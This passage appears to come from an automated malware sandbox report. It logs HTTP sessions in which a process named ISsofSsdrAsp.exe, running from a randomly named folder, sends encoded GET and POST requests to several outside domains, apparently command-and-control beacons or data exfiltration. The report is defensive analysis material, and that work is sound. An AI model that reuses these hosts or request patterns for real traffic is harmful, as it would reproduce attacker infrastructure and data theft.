51 54 30 42 4f 5a 68 5a 6a 51 4b 48 38 61 41 66 53 4f 30 32 57 39 62 51 34 42 37 38 30 4d 43 56 37 51 43 57 31 6c 6c 45 34 6b 70 6a 33 4e 33 49 39 71 6f 42 2f 79 74 4e 64 59 30 5a 6c 61 63 48 77 67 30 6f 5a 73 55 32 55 73 64 70 52 36 63 4d 32 38 4c 62 39 77 69 67 4e 78 5a 63 77 57 49 48 75 51 5a 63 52 52 41 5a 54 74 55 54 33 50 38 67 67 59 63 47 32 31 50 4c 33 42 41 76 62 54 52 38 62 6e 59 72 6d 71 4e 4a 55 38 2b 52 2f 4e 55 78 66 59 53 6f 64 58 38 6d 52 4f 76 33 43 45 2f 46 72 62 74 35 6f 79 78 53 50 55 72 33 55 35 42 5a 73 2b 31 46 6f 61 4c 4f 62 49 32 73 78 77 6c 79 69 31 6a 33 41 59 39 32 48 41 5a 73 58 74 33 30 35 6d 74 78 72 46 38 69 4f 46 46 48 6e 75 6c 52 4d 34 70 6a 45 4f 68 4e 54 5a 2b 70 35 77 6f 48 4d 71 48 64 62 31 7a 49 35 30 30 6c 50 32 4a 7a 4d 50 73 48 74 50 74 63 73 61 31 71 31 [TRUNCATED] Data Ascii: I2ID3h=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxnA56MvrB/kWFmlutcCk+QT0BOZhZjQKH8aAfSO02W9bQ4B780MCV7QCW1llE4kpj3N3I9qoB/ytNdY0ZlacHwg0oZsU2UsdpR6cM28Lb9wigNxZcwWIHuQZcRRAZTtUT3P8ggYcG21PL3BAvbTR8bnYrmqNJU8+R/NUxfYSodX8mROv3CE/Frbt5oyxSPUr3U5BZs+1FoaLObI2sxwlyi1j3AY92HAZsXt305mtxrF8iOFFHnulRM4pjEOhNTZ+p5woHMqHdb1zI500lP2JzMPsHtPtcsa1q1tjk9IY03zE5fEQyP80/uGolVQG8I1zZG04qyR5dXxCpJIcZXEwmlxQGBy4jhQnGYF8Pa0QGAYDVHj8dt/7P0FZWOsH+xa29BKAq9uGHnnGDbO/ozdewx2XfC6RFuButacvwptn9iWlxXRpRtEZtmV43vxMLWnt8RmBOH8KCyHUX+QYWdfdZaHfj4oY6tlTlI+MjI3RmQjVALlSVIhYOkXXwJrVtjRBYyuqr/CuTcE2LX9NFF/eIqz1q/szlGxsR796k6qqAW4YjjskjqvAxNCMuWwPBa3TKTHekJ88ZC3yh97CsMZeYRHV0AeXOKO+g4+RuAAiZ2nPd78H9RXq6VjbV0mYCGi9wc87696YkMSGC5bGZKXRHkC7tFZcPkzk9QlIFi2cD4etz7yFGhuLWpIa7q2aKx/P/cohFroi/23kCcu4nfYflR3BA2OFAFaeu+5tuUYye2DYqp7gGM/AuBUzNYA5VW94I1cIYcKJXPbjSjKU310XJMIIB6f+K1EDRZffeHQE6uOkKINscI3cZVcvxik9qtKLneEhFWkAAhjm2dkHGBvC5gZpTBjYYEk3wFPNEdUp2XFK9j0RFFdCRHQdbMIoPqXUSDb60MZnrunp+jtzdNqDnnxb4fAo7F5d67S2bKdb50/vP5d6Sbrfl+Apv9jYvk8ERxjn [TRUNCATED]
May 30, 2024 15:02:43.559993029 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 30 May 2024 13:02:43 GMT server: LiteSpeed Data Raw: 63 33 33 0d 0a 80 90 02 80 f8 9f da ea 3f 77 55 07 f9 19 7a 31 cc b3 6c b3 f4 66 30 3d eb d2 b3 ad 3d c2 ba 60 f5 c8 92 9e 24 03 fe 14 55 3f c8 7f 10 64 ff de b5 5e 21 2b 94 ad f0 49 26 62 ef 3e 21 4e 26 39 da db 4f 84 6d 15 d3 f3 55 0a 00 85 ac 91 ad b1 15 aa 8f 31 bd af 9d 94 a3 88 40 ad 6c 26 46 c0 45 e6 07 d1 41 34 ab 43 a3 06 b0 7a a3 b2 47 9a 7d fa d0 9b 1f 44 00 b0 87 38 fe cd ae 1b dc 50 38 68 fe 52 4f a1 ec 6d 09 9e 4e 53 43 f3 86 ca 9e 08 f9 f5 88 84 6d ab 07 94 04 75 4a b0 f9 f7 c6 cc 57 5c 51 39 ec 11 e5 c6 04 36 68 5f fb c3 e3 b7 60 6c de 8e 0f fb f0 ec fe b3 fb 4f 30 7e b4 43 33 05 b3 01 8b bf cf 43 a3 2b 47 81 30 7e 84 6b 27 75 90 7a 85 27 ad 52 1d 9e eb 40 2b c7 03 09 bc 37 0b 13 64 85 0f 9d 0f d4 f8 5e 36 3f 18 91 6a a2 59 01 4d ce d2 38 28 8c f3 26 58 19 b3 52 64 55 eb 49 64 e9 d4 1a 66 df 98 16 49 3e 87 af c9 f4 67 b1 a0 41 33 b8 75 0a fc 37 a9 0e c1 fa 22 cb 7c cd 6b be 1c 8b b4 32 0d 81 36 a1 e5 c1 cd 62 7a d3 43 16 13 e5 4a a2 cb ce 36 96 01 bd 6e d6 5a 65 b8 f0 d9 28 1f 8d b3 [TRUNCATED] Data Ascii: c33?wUz1lf0==`$U?d^!+I&b>!N&9OmU1@l&FEA4CzG}D8P8hROmNSCmuJW\Q96h_`lO0~C3C+G0~k'uz'R@+7d^6?jYM8(&XRdUIdfI>gA3u7"\|k26bzCJ6nZe("m1VA4H]cQX\Tmpb'Yv+~y`o5FXAgOYM7F3=$a6C?t6 oToNeN}J{]"o}Z)j!lr4NAR54:Ter+}V_I?\|vyr$v)so6$kIA<;;f,mA^$AmpCpL 6{BbZN1<h ~bt?&Np4"nsz'$Oi/HB!=j,94/\|,E6++2xEQi'j.oXibCJVjT_I}hzh1`7N&w
May 30, 2024 15:02:43.560045004 CEST	1236	IN	Data Raw: 97 fb a5 71 27 e7 91 50 7a 58 67 67 f5 a6 92 5c 31 25 7d 48 9b 4c 70 2e 8e 0e 96 c2 ad 81 b0 cf 8a da ac c9 89 b4 02 07 78 80 5f 2f 67 ff 54 4a 16 da 84 7e a1 b8 0f cc 2c 59 e8 2c 0d 8a 62 cc d1 ba 86 e6 51 21 51 22 2e 07 b3 0d 3d cf 14 58 ec ec Data Ascii: q'PzXgg\1%}HLp.x_/gTJ~,Y,bQ!Q".=XcM(r)rQ%5m'im` GT_2_ZQo_8gbD=`ezDtcPwD9x\|m\ GjqrTq+n.&r
May 30, 2024 15:02:43.560070038 CEST	1040	IN	Data Raw: 71 3d cb 1b de 10 ee 94 25 e2 19 4f 99 b5 da 5b c5 7d 1d 43 90 54 f3 af 73 bd 92 3e a4 5c 88 7e ac ba 3e b2 60 e0 ec 7c 2d 8c e8 b2 d9 ed 39 26 5f 60 22 d2 ca e6 ac 7d 14 a2 aa 2e 3d f4 59 d8 3a e5 d6 67 4b 0c 2b 65 6b 29 64 13 63 7e f4 5b 7f b5 Data Ascii: q=%O[}CTs>\~>`\|-9&_`"}.=Y:gK+ek)dc~[.iz&96_s=!?/3mheaUqt;760;5SG\|N ?U~TGk.(q\81lLk1/i}(c/i+
May 30, 2024 15:02:43.562985897 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49728	64.46.118.35	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:44.852667093 CEST	438	OUT	GET /0a9p/?aN6=3TWTWTzxVTU&I2ID3h=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SdTcO7d1UbA68KXQq7mwut3Hj5agfoSiSpP8q1JtrU0Uptw== HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:02:46.066042900 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_ x-litespeed-cache: miss transfer-encoding: chunked date: Thu, 30 May 2024 13:02:45 GMT server: LiteSpeed Data Raw: 32 39 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f [TRUNCATED] Data Ascii: 29ac<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... SEO --><title>SHAHAF 3D</title><meta name="description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/>... og meta for facebook, googleplus --><meta property="og:title" content="SHAHAF 3D"/><meta property="og:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta property="og:url" content="https://shahaf3d.com"/><meta property="og:type" content="website" /><meta property="og:image" content="https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg"/>... twitter meta --><meta name="twitter:card" content="summary_large_image"/><m
May 30, 2024 15:02:46.066057920 CEST	224	IN	Data Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 Data Ascii: eta name="twitter:title" content="SHAHAF 3D"/><meta name="twitter:description" content="Concrete 3D Printing Fully Integrated Robotic Systems"/><meta name="twitter:url" content="https://shahaf3d.com"/><meta name="twitt
May 30, 2024 15:02:46.066093922 CEST	1236	IN	Data Raw: 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 73 68 61 68 61 66 2d 33 64 2d 63 6f 6e 63 72 Data Ascii: er:image" content="https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg"/><link rel="stylesheet" href="http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.10" type=
May 30, 2024 15:02:46.066204071 CEST	1236	IN	Data Raw: 73 75 62 73 63 72 69 62 65 20 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 63 6f 6c 6f 72 3a 20 68 73 6c 28 20 30 2c 20 30 25 2c 20 39 30 25 29 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6d 70 2d 73 75 62 73 Data Ascii: subscribe :-ms-input-placeholder {color: hsl( 0, 0%, 90%);} .cmp-subscribe ::-moz-placeholder {color: hsl( 0, 0%, 90%);} .input-icon:before, .cmp-subscribe input[type="email"],.cmp-subscribe input[type="text"]{color:
May 30, 2024 15:02:46.066219091 CEST	1236	IN	Data Raw: 62 6f 78 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 63 68 65 63 6b 62 6f 78 3b 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 68 65 69 67 68 74 3a 20 69 6e 69 74 69 61 6c 3b 7d 0d 0a 20 20 20 20 23 63 6f 75 6e 74 65 72 2e 65 78 70 69 72 Data Ascii: box;-moz-appearance: checkbox;width: initial;height: initial;} #counter.expired {display: none; } input, button { box-shadow: inset 0 0 0 0 !important; -webkit-box-shadow: inset 0 0 0 0 !important; -webkit-
May 30, 2024 15:02:46.066235065 CEST	1236	IN	Data Raw: 73 63 72 69 62 65 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 49 6e 73 65 72 74 20 79 6f 75 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 2e 22 20 72 65 71 75 69 72 65 64 3e 20 0a 20 20 20 20 20 20 20 20 20 Data Ascii: scribe" name="email" placeholder="Insert your email address." required> <input type="submit" id="submit-subscribe" value="Submit"> <div style="display: none;"> <input type="
May 30, 2024 15:02:46.066251040 CEST	1236	IN	Data Raw: 20 72 65 73 75 6c 74 45 6c 65 6d 65 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 59 6f 75 20 6d 75 73 74 20 61 67 72 65 65 20 77 69 74 68 20 6f 75 72 20 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 2e 27 3b 0a 20 20 20 20 20 20 Data Ascii: resultElement.innerHTML = 'You must agree with our Terms and Conditions.'; return false; } // submit form subForm( form, resultElement, emailInput, firstnameInput, lastnameInput ); }form.
May 30, 2024 15:02:46.066266060 CEST	1236	IN	Data Raw: 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 Data Ascii: } } } </script> <script src='http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2"'></script> <script>
May 30, 2024 15:02:46.066281080 CEST	1236	IN	Data Raw: 66 69 72 73 74 6e 61 6d 65 49 6e 70 75 74 2c 20 6c 61 73 74 6e 61 6d 65 49 6e 70 75 74 2c 20 74 6f 6b 65 6e 20 3d 20 27 27 20 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 65 6d 61 69 6c 49 6e 70 75 74 2e 76 61 6c 75 65 20 21 Data Ascii: firstnameInput, lastnameInput, token = '' ) { if ( emailInput.value !== '' ) { const firstname = firstnameInput === null ? '' : firstnameInput.value; const lastname = lastnameInput === null ? '' :
May 30, 2024 15:02:46.066298008 CEST	991	IN	Data Raw: 66 6f 72 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 27 2d 73 75 62 73 63 72 69 62 65 2d 66 61 69 6c 65 64 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 2e 63 6c 61 73 73 4c 69 73 Data Ascii: form.classList.remove('-subscribe-failed'); form.classList.add('-subscribe-successful'); emailInput.value = ''; firstnameInput ? firstnameInput.value = '' : null;
May 30, 2024 15:02:46.068216085 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49729	54.179.173.60	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:52.166620970 CEST	733	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 4f 7a 45 59 6d 63 4d 72 34 34 70 30 30 66 68 53 67 6c 33 66 50 4e 53 5a 48 77 41 44 5a 64 41 74 72 5a 4f 43 6a 69 56 52 6a 72 31 55 37 48 4f 41 64 51 35 59 4f 78 4b 4d 52 38 62 42 58 62 46 70 64 47 39 36 56 62 44 74 48 68 56 4d 49 74 51 30 4f 6f 37 33 71 2b 49 6c 49 57 48 5a 48 54 61 49 4f 4f 38 64 77 50 57 65 35 7a 47 42 6d 38 55 47 50 4a 38 59 36 7a 4f 50 68 6a 36 6b 34 65 38 53 75 78 51 64 43 63 44 33 5a 77 44 41 54 72 30 68 48 73 68 77 2b 31 39 74 63 2f 67 2f 64 6e 51 33 61 46 57 38 46 37 44 5a 66 38 64 48 46 71 65 66 6e 55 59 31 78 7a 33 38 6a 2b 51 3d Data Ascii: I2ID3h=wkxrU9nSBfOKOzEYmcMr44p00fhSgl3fPNSZHwADZdAtrZOCjiVRjr1U7HOAdQ5YOxKMR8bBXbFpdG96VbDtHhVMItQ0Oo73q+IlIWHZHTaIOO8dwPWe5zGBm8UGPJ8Y6zOPhj6k4e8SuxQdCcD3ZwDATr0hHshw+19tc/g/dnQ3aFW8F7DZf8dHFqefnUY1xz38j+Q=
May 30, 2024 15:02:53.163419962 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 May 2024 13:02:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
May 30, 2024 15:02:53.163459063 CEST	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-05-30 13:02:52.97843515
May 30, 2024 15:02:53.163470030 CEST	1236	IN	Data Raw: 32 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 34 38 35 39 36 33 2e 34 38 37 38 34 35 39 33 37 22 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 38 20 4d 61 79 20 32 30 33 34 20 31 33 3a 30 32 3a 35 32 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b Data Ascii: 2 +0000 UTC m=+1485963.487845937"; Expires=Sun, 28 May 2034 13:02:52 GMTSet-Cookie: LADI_CLIENT_ID=d06560c0-bf94-4479-48cb-be7ff6dfb61a; Expires=Sun, 28 May 2034 13:02:52 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/3h10; Expires=Sun, 28 May 203
May 30, 2024 15:02:53.163480043 CEST	224	IN	Data Raw: 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 Data Ascii: ; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10;
May 30, 2024 15:02:53.163491964 CEST	1236	IN	Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 43 4f 4e 46 49 47 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/3h10; Max-Age=0Set-Cookie: LADI_FUNNEL_NEXT_URL=; Path=/3h10; Max-Age=0Set-Cookie: LADI_FUNNEL_PREV_URL=; Path=/3h10; Max-Age=0Set-Co
May 30, 2024 15:02:53.163506031 CEST	1236	IN	Data Raw: 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 46 4f 52 4d 53 55 42 4d 49 54 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 Data Ascii: e: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/3h10; Max-Age=0Statuscode: 502Strict-Transport-Security: max-age=31536000; includeS
May 30, 2024 15:02:53.163517952 CEST	570	IN	Data Raw: 45 09 b2 cc 92 fb 87 56 35 d8 be c0 4f 8b 3b e0 52 0c cd 79 9e 04 17 8e ce 31 f0 f5 a0 48 8a e0 7c 7e e0 1a fc c3 54 c0 09 0c dc 19 70 0e 7a e8 25 20 a7 c2 23 96 42 6f d1 13 82 31 9b e6 1d 96 4c a8 1a 47 05 de a3 dc e0 00 e3 45 8c 72 1c 79 24 a6 Data Ascii: EV5O;Ry1H\|~Tpz% #Bo1LGEry$V\|l:1L3n/.)VYA1\n~=(Spib\kYK6t;/g%PqlG\Km_)dVhj1HQzmxsEF+D\0h..
May 30, 2024 15:02:53.163883924 CEST	1236	IN	Data Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42 Data Ascii: ]H^c>rr)Eg\|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D\|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
May 30, 2024 15:02:53.163894892 CEST	224	IN	Data Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12 Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N
May 30, 2024 15:02:53.163906097 CEST	1236	IN	Data Raw: 91 e4 7e 7c f0 f3 58 94 52 bd e6 96 28 5f 01 a6 b2 0e fd f1 f1 51 fe 16 8e 37 53 64 73 a1 07 f1 31 89 07 8c ee f8 92 1a d4 0b f5 6f 9d d2 dd f1 39 d9 1a 9f 4b 5a d8 e4 ef f1 cd 67 3b 02 c4 f8 8e 2b 67 bf b6 1e f2 01 7e 5c b5 72 a5 f6 f3 5d 72 76 Data Ascii: ~\|XR(_Q7Sds1o9KZg;+g~\r]rvQ,;zAr)K?=n+\|ZCb)]Li9HvM\|ONGtI[tQlHr0szCuD~~O[?y~TK\,%y
May 30, 2024 15:02:53.164056063 CEST	967	IN	Data Raw: bf c5 61 61 1a 2f c2 b8 c1 52 00 ee 91 4a 92 04 b0 52 27 13 f8 03 e0 a2 a0 67 a7 98 fb 04 e5 88 d6 ae ba ce 09 5f c9 84 22 26 6a 9b 52 c5 56 73 a7 b1 43 2b 8f 1e 3e 7f f8 db e7 0f 8f 3e 69 a5 14 6d d1 45 8f b1 88 3d d2 da 6e 36 76 f1 8b 2e 22 d2 Data Ascii: aa/RJR'g_"&jRVsC+>>imE=n6v."h&Vh&,RD:7*##Ry[VYf0N:uSm!gDY)UJP!B0uKLhL'akdw5Xd\`F:7T(,UU<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49730	54.179.173.60	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:54.714138031 CEST	753	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 6b 74 72 37 57 43 6b 6d 4a 52 67 72 31 55 6a 33 4f 2f 43 67 34 55 4f 78 48 2f 52 34 62 42 58 62 42 70 64 48 4e 36 56 6f 37 75 42 78 56 43 44 4e 51 79 41 49 37 33 71 2b 49 6c 49 56 37 67 48 53 2b 49 50 2b 4d 64 77 74 75 64 36 7a 47 43 75 63 55 47 45 70 38 63 36 7a 50 73 68 69 6e 4c 34 64 45 53 75 31 63 64 43 4e 44 77 51 77 44 47 64 4c 30 76 4d 63 63 4a 77 31 35 76 63 4a 56 70 43 57 59 59 66 7a 37 57 66 5a 4c 78 4d 63 78 2f 56 35 57 6f 32 6b 35 63 72 51 6e 4d 39 70 48 30 72 6b 37 30 52 55 32 75 69 48 76 4b 4e 35 6e 47 55 76 6d 2f Data Ascii: I2ID3h=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvktr7WCkmJRgr1Uj3O/Cg4UOxH/R4bBXbBpdHN6Vo7uBxVCDNQyAI73q+IlIV7gHS+IP+Mdwtud6zGCucUGEp8c6zPshinL4dESu1cdCNDwQwDGdL0vMccJw15vcJVpCWYYfz7WfZLxMcx/V5Wo2k5crQnM9pH0rk70RU2uiHvKN5nGUvm/
